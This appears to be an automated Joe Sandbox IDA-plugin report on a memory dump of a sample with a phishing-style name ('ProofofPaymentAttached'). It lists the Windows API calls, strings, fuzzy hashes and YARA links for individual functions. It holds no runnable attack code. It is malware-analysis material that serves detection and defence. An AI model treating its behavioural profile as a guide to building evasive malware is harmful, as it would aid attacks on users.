SafeArrayAllocData.OLEAUT32(?), ref: 00FE9549
VariantInit.OLEAUT32(?), ref: 00FE955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 00FE957B
VariantCopy.OLEAUT32(?,?), ref: 00FE95BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00FE95D2
VariantClear.OLEAUT32(?), ref: 00FE95E7
SafeArrayDestroyData.OLEAUT32(?), ref: 00FE95F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE95FD
VariantClear.OLEAUT32(?), ref: 00FE960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE961A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 080c682d66997df9b59163dd6823d7f9edbb8e42d113639646fd770ebd5a9f03
Instruction ID: 314b8258c7bbadada326c30c38724ee3f83932459f6707e2d6b92ed0a6abd20b
Opcode Fuzzy Hash: 080c682d66997df9b59163dd6823d7f9edbb8e42d113639646fd770ebd5a9f03
Instruction Fuzzy Hash: 7C417E71D00219AFCB11EFE5D844ADEBBB9FF08350F408069F541A3251DB79EA45DBA1

Function 0100ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

CoInitialize.OLE32 ref: 0100ADF6
CoUninitialize.OLE32 ref: 0100AE01
CoCreateInstance.OLE32(?,00000000,00000017,0103D8FC,?), ref: 0100AE61
IIDFromString.OLE32(?,?), ref: 0100AED4
VariantInit.OLEAUT32(?), ref: 0100AF6E
VariantClear.OLEAUT32(?), ref: 0100AFCF

Strings

Failed to create object, xrefs: 0100AE6C, 0100AF22
NULL Pointer assignment, xrefs: 0100AEA6
Invalid parameter, xrefs: 0100AEED

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: b2fee9c20e46c8f3487d1d4bd15c214ccaa2964749af069ba8d5a216f6cda8ba
Instruction ID: ce05de4a47ae8c12b130479c6ca0196af39ed3821149d011e86ec5e56ae53cb0
Opcode Fuzzy Hash: b2fee9c20e46c8f3487d1d4bd15c214ccaa2964749af069ba8d5a216f6cda8ba
Instruction Fuzzy Hash: 68613571208301EFE712DB95C849B6EBBE8AF88714F04485DFA859B2D1C774ED44CB92

Function 01008107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 01008168
inet_addr.WSOCK32(?), ref: 010081AD
gethostbyname.WSOCK32(?), ref: 010081B9
IcmpCreateFile.IPHLPAPI ref: 010081C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01008237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0100824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 010082C2
WSACleanup.WSOCK32 ref: 010082C8

Strings

Ping, xrefs: 010081EB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 395b21b4d177cf7171a59b5eb97661df4ae8ebbb2dac97c359079001ee9780e6
Instruction ID: cf7a72d35df0176873bac9dba599985d6ecff70d793753bd015dbbeb47b20348
Opcode Fuzzy Hash: 395b21b4d177cf7171a59b5eb97661df4ae8ebbb2dac97c359079001ee9780e6
Instruction Fuzzy Hash: 03518031A047019FE762DF64CD45B6ABBE5BF48310F04885AFAD59B2D1DB74E900DB42

Function 00FFE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FFE40C
GetLastError.KERNEL32 ref: 00FFE416
SetErrorMode.KERNEL32(00000000,READY), ref: 00FFE483

Strings

NOTREADY, xrefs: 00FFE442
UNKNOWN, xrefs: 00FFE43B
INVALID, xrefs: 00FFE455
READONLY, xrefs: 00FFE44E
READY, xrefs: 00FFE45C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 8a4bec8935bde318f1645909653054a8d746cbab64adf6987241b71ec8a64eff
Instruction ID: 1a015cf62a8d6daafd860b856bcd98e4771ece167e5ee020f6c5bd093508ba98
Opcode Fuzzy Hash: 8a4bec8935bde318f1645909653054a8d746cbab64adf6987241b71ec8a64eff
Instruction Fuzzy Hash: 6B31A439A0020D9BD700EBA5C885BBDB7B8EF44710F148019E615DB2B1DB759901EB91

Function 00FEB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FEB98C
GetDlgCtrlID.USER32 ref: 00FEB997
GetParent.USER32 ref: 00FEB9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00FEB9B6
GetDlgCtrlID.USER32(?), ref: 00FEB9BF
GetParent.USER32(?), ref: 00FEB9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 00FEB9DE

Strings

ComboBox, xrefs: 00FEB911
ListBox, xrefs: 00FEB949

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: dd7c556e495191eb4abb8d48116830fc8d74035df33b822edf1b9483eff66002
Instruction ID: d9c492d716cb9fcac22d84af0981d4b9a6eec324dbb5c6c2ec93fb338a7c016f
Opcode Fuzzy Hash: dd7c556e495191eb4abb8d48116830fc8d74035df33b822edf1b9483eff66002
Instruction Fuzzy Hash: 6C21F574900104BFCB04ABA2CC86EFEBBB8EF49310F504119F6A1972D2DB799815EF60

Function 00FEB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FEBA73
GetDlgCtrlID.USER32 ref: 00FEBA7E
GetParent.USER32 ref: 00FEBA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00FEBA9D
GetDlgCtrlID.USER32(?), ref: 00FEBAA6
GetParent.USER32(?), ref: 00FEBAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 00FEBAC5

Strings

ComboBox, xrefs: 00FEB9FA
ListBox, xrefs: 00FEBA32

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: db16f46ef3f8a8178ef60c1373e6001fe22e9820831838d133194717c47cda98
Instruction ID: 572ae8bd802ab9d8d75580a5bc2a631a0dfd305cf082bb5a53d744bf26f2c982
Opcode Fuzzy Hash: db16f46ef3f8a8178ef60c1373e6001fe22e9820831838d133194717c47cda98
Instruction Fuzzy Hash: 9C21C174900204BBDF00ABA1CC85FFEB779EF49300F004015F9A197195DB7D8815AF60

Function 00FEBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00FEBAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 00FEBAF8
_wcscmp.LIBCMT ref: 00FEBB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FEBB85

Strings

SHELLDLL_DefView, xrefs: 00FEBB04
list, xrefs: 00FEBB67
largeicons, xrefs: 00FEBB19
details, xrefs: 00FEBB33
smallicons, xrefs: 00FEBB4D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 7f69851cea3e4b5fa45daacf2eb994846542555ea4e18dbe2b74f055d9c91980
Instruction ID: 64e17ab4bbad929fd0713698085e6139ded2ded77800c4185165314d6e0686cc
Opcode Fuzzy Hash: 7f69851cea3e4b5fa45daacf2eb994846542555ea4e18dbe2b74f055d9c91980
Instruction Fuzzy Hash: 42110676A08343FAFA206632EC06EAB379DDB55734F200026F994E40D9EFA6A8517614

Function 0100B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0100B2D5
CoInitialize.OLE32(00000000), ref: 0100B302
CoUninitialize.OLE32 ref: 0100B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0100B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0100B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0100B56D
CoGetObject.OLE32(?,00000000,0103D91C,?), ref: 0100B590
SetErrorMode.KERNEL32(00000000), ref: 0100B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0100B623
VariantClear.OLEAUT32(0103D91C), ref: 0100B633

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 2e9cd3ac8beed5a5325c32597af873b47a7260883d026ae607be79b439884e49
Instruction ID: 8c8af654c6ef2e84f7e27a53a102db4c52b1cacf310a4bf5a73a8e5ac2686bf7
Opcode Fuzzy Hash: 2e9cd3ac8beed5a5325c32597af873b47a7260883d026ae607be79b439884e49
Instruction Fuzzy Hash: 03C14575608301AFE701DF69C884A6BBBE9FF88304F00495DF98A9B291DB71ED05CB52

Function 00FDACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00FDACC1

Part of subcall function 00FD7CF4: __mtinitlocknum.LIBCMT ref: 00FD7D06
Part of subcall function 00FD7CF4: EnterCriticalSection.KERNEL32(00000000,?,00FD7ADD,0000000D), ref: 00FD7D1F

__calloc_crt.LIBCMT ref: 00FDACD2

Part of subcall function 00FD6986: __calloc_impl.LIBCMT ref: 00FD6995
Part of subcall function 00FD6986: Sleep.KERNEL32(00000000,000003BC,00FCF507,?,0000000E), ref: 00FD69AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 00FDACED
GetStartupInfoW.KERNEL32(?,01066E28,00000064,00FD5E91,01066C70,00000014), ref: 00FDAD46
__calloc_crt.LIBCMT ref: 00FDAD91
GetFileType.KERNEL32(00000001), ref: 00FDADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00FDAE11

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 7bf3030c04cc1c6ffd9e37254e00a0aa07ebcdd93a3e0d33bf8e5c03b1ab76f1
Instruction ID: db5127e4bbdb7197cbee96258bd12f37727b456464d9af1174a99d36e799e9ba
Opcode Fuzzy Hash: 7bf3030c04cc1c6ffd9e37254e00a0aa07ebcdd93a3e0d33bf8e5c03b1ab76f1
Instruction Fuzzy Hash: E081D471D053458FDB24CF68C8406ADBBF6AF45330B28425EE4A6AB3D1D7399803EB59

Function 00FF67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00FF67FD
__swprintf.LIBCMT ref: 00FF680A

Part of subcall function 00FD172B: __woutput_l.LIBCMT ref: 00FD1784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00FF6834
LoadResource.KERNEL32(?,00000000), ref: 00FF6840
LockResource.KERNEL32(00000000), ref: 00FF684D
FindResourceW.KERNEL32(?,?,00000003), ref: 00FF686D
LoadResource.KERNEL32(?,00000000), ref: 00FF687F
SizeofResource.KERNEL32(?,00000000), ref: 00FF688E
LockResource.KERNEL32(?), ref: 00FF689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00FF68F9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: c8111fb57d38ee0e4d5b8a893b8ec3e009ef3351d2ad6675ffd6abe33677df05
Instruction ID: fd74d3b10be2e3450592ea9811146444bff059f5f808de796eb96cc4ecd43d22
Opcode Fuzzy Hash: c8111fb57d38ee0e4d5b8a893b8ec3e009ef3351d2ad6675ffd6abe33677df05
Instruction Fuzzy Hash: 2E31727190021AABDB219FA0DD45EBF7BACFF08394F044429FA51E2150EB79D911EBA0

Function 00FF4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FF4047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FF30A5,?,00000001), ref: 00FF405B
GetWindowThreadProcessId.USER32(00000000), ref: 00FF4062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF30A5,?,00000001), ref: 00FF4071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FF4083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00FF30A5,?,00000001), ref: 00FF409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF30A5,?,00000001), ref: 00FF40AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FF30A5,?,00000001), ref: 00FF40F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00FF30A5,?,00000001), ref: 00FF4108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00FF30A5,?,00000001), ref: 00FF4113

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 5dbbcb08e792973396d83e305d8ad1f429f6fbfb3cc833187aa417069cb32159
Instruction ID: f6ba8b2797834e4b9aa47d5db6356ce523c64ab7e4323f3f71fd696209da038a
Opcode Fuzzy Hash: 5dbbcb08e792973396d83e305d8ad1f429f6fbfb3cc833187aa417069cb32159
Instruction Fuzzy Hash: 5631B472900209ABFB31DB55D845B7A77BDBF94321F108005FA85DA254DB7AA840AF61

Function 0102DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00FCB496
SetTextColor.GDI32(?,000000FF), ref: 00FCB4A0
SetBkMode.GDI32(?,00000001), ref: 00FCB4B5
GetStockObject.GDI32(00000005), ref: 00FCB4BD
GetClientRect.USER32(?), ref: 0102DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 0102DD7A
GetWindowDC.USER32(?), ref: 0102DD86
GetPixel.GDI32(00000000,?,?), ref: 0102DD95
ReleaseDC.USER32(?,00000000), ref: 0102DDA7
GetSysColor.USER32(00000005), ref: 0102DDC5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 2db1ac4a020e05549059e07d7400aa596575bfc59787f9097a9c7906b24a443f
Instruction ID: c9e9f17fdbc17f7d8249a772cda4a41fe35853193957e7423b32b194c0333801
Opcode Fuzzy Hash: 2db1ac4a020e05549059e07d7400aa596575bfc59787f9097a9c7906b24a443f
Instruction Fuzzy Hash: B3118E31500205FFDB216FF4EC0AFA97BB9EB08325F508665FAA6950D6CB364941EF20

Function 00FECB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00FECF50), ref: 00FECE90

Strings

REGEXPCLASS, xrefs: 00FECC56
INSTANCE, xrefs: 00FECD9E
TEXT, xrefs: 00FECDC7
CLASSNN, xrefs: 00FECC33
CLASS, xrefs: 00FECC10
NAME, xrefs: 00FECCC2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 82079852a3b4716c39c166b39d8a830c57153a773d11e3821d02e428adda93ad
Instruction ID: e7e2ce6e885c3e51b80045887b4377378e7cf47e6818b04e305b9a3bc2d9ea9c
Opcode Fuzzy Hash: 82079852a3b4716c39c166b39d8a830c57153a773d11e3821d02e428adda93ad
Instruction Fuzzy Hash: 3A91A531A00286ABCB18DF61C882BEAFB75FF04310F548519F859A7251DF34A95BEBD0

Function 00FB3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FB30DC
CoUninitialize.OLE32(?,00000000), ref: 00FB3181
UnregisterHotKey.USER32(?), ref: 00FB32A9
DestroyWindow.USER32(?), ref: 01025079
FreeLibrary.KERNEL32(?), ref: 010250F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 01025125

Strings

close all, xrefs: 00FB30D7

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7f5a02afe10a8520fbc59be870300cea01c44abbadeb649a33332c8d88d4ba39
Instruction ID: 817caffdc52f1ecf6b26c53fe6047edf9f28ef87f7dd836347c7ee036b8cd71b
Opcode Fuzzy Hash: 7f5a02afe10a8520fbc59be870300cea01c44abbadeb649a33332c8d88d4ba39
Instruction Fuzzy Hash: 809149346402128FC715EF15CC96BA9F3A8FF04304F5482A9E54AA7262DF38AE56EF54

Function 00FCCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00FCCC15

Part of subcall function 00FCCCCD: GetClientRect.USER32(?,?), ref: 00FCCCF6
Part of subcall function 00FCCCCD: GetWindowRect.USER32(?,?), ref: 00FCCD37
Part of subcall function 00FCCCCD: ScreenToClient.USER32(?,?), ref: 00FCCD5F

GetDC.USER32 ref: 0102D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0102D14A
SelectObject.GDI32(00000000,00000000), ref: 0102D158
SelectObject.GDI32(00000000,00000000), ref: 0102D16D
ReleaseDC.USER32(?,00000000), ref: 0102D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0102D200

Strings

U, xrefs: 0102D0D5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

